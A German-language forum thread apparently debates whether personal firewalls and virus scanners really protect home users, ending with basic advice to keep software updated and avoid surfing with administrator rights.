Haufen Kroppzeugs ausfiltern - wenn der Scanner up-to-date ist (und meistens
ist er das ja nicht).
Mancher will einfach nur surfen und sich nicht durch unübersichtliche
FAQ quälen.
Das wollen wir alle. Ich machs sogar ständig so.
Ich habe bereits Tests von Firewalls in der „Computer-Bild“
In was?
Stefan
hi!
Mir ist sehr wohl klar, dass die Aktualität der Software
wichtig ist, aber du glaubst doch nicht im Ernst, dass
irgendwo in einem Rechnerverbund mit hunderten von Rechnern
sofort nach dem Erscheinen auf jedem einzelnen das Patch
installiert wird. Die Admins wären doch dann nur noch mit der
Installation der Patches beschäftigt.
nö, eigentlich nicht, daß geht komplett automatisch, da gibt’s von microsoft sogar den sus …
Wie gesagt, mancher Surfer macht sich da nicht so viele
Gedanken oder er hat keine Lust, sich Gedanen zu machen. Dem
hilft die Software.
sobald ich also zone-alarm, norton i-net-security o.ä. installiert habe, kann ich also wie wild drauflosklicken???
Was ist denn dabei? Es sind doch meine
Ressourcen, die sie verbraucht!
und mich mit spam-/viren-/etc.-mails vollmüllt, die ich mit meiner bandbreite, für die ich zahle, runterladen muß
Ich bin kein Administrator und kann nicht beurteilen, wie es
dazu kam und ob der Virus nicht etwa mit einer Fremd-CD-ROM
eingeschleppt wurde.
das wäre dann eigentlich noch schlimmer!!! schmeißt eure admins raus!
Okay, die Sicherheit ist niemals komplett, aber die Firewall
verhindert wenigstens einen Teil der Angriffsversuche
„ganz komisch bösartiger ping wollte in das system eindringen“ - klingt äußerst gefährlich …
Nicht jeder hat Lust und Zeit, sich
die Grundlagen der IT-Sicherheit reinzutun. Mancher will
einfach nur surfen und sich nicht durch unübersichtliche FAQ
quälen.
und dafür gibt’s spezialisten - oder machst du bei deinem auto das service/den tüv/das „pickerl“ selber?
Ich habe bereits Tests von Firewalls in der „Computer-Bild“ […] gelesen
diese aussage wurde wohl schon genug kommentiert …
grüße und viele pings an deine pf
tomh
Was Virenscanner angeht stehe ich auf der anderen Seite der
Expertenmeinungen
hier im Forum und empfehle die Dinger sogar (auch wenn ich
selber keinen
benutze, aber ich benutze ja auch kein Windows). ZUmindest
kann man damit einen
Haufen Kroppzeugs ausfiltern - wenn der Scanner up-to-date ist
(und meistens
ist er das ja nicht).
Nunja. Virenscanner (VS) sind zumindet sehr nützlich, um einem zu sagen, wie der Virus heisst, den man gerade zugeschickt bekommen hat. Gut, manchmal weiss er’s nicht, aber spätestens am nächsten Tag hat er dann den Namen.
Und auf einem MTA als automatisierter Vorfilter können sie einem einen Haufen lästigen Traffic ersparen.
Empfehlenswert ist so ein VS, keine Frage. Nur die Annahme vieler User, ein VS könne sie vor Viren schützen, die entbehrt leider jeder Grundlage.
Gruss
Schorsch
Bevor ihr euch alle auf den einen Sturz könnt ihr mir doch lieber sagen, wie es richtig gemacht wird! Brauche ich ne zusätzliche Firewall auf meinen 2. (Haupt-) Rechner, der nur zum surfen ist, oder nicht)? Welche altanativen hätte ich? Wenn ein Router hier helfen würde, welcher ist da am besten geeignet? Gibts auch interne Router, sprich welche, die man in einen PC einbauen kann(Egal wie)?
THX
hi!
wurde ca. 120394875 mal erwähnt:
- system und virenscanner auf dem aktuellsten stand halten (am besten mit automatischen update-job)
- http://www.dingens.org/
- nicht gerade mit administrator-rechten surfen - je weniger rechte, um so besser
- lesen - denken - „ok“ oder „abbrechen“ klicken
grüße,
tomh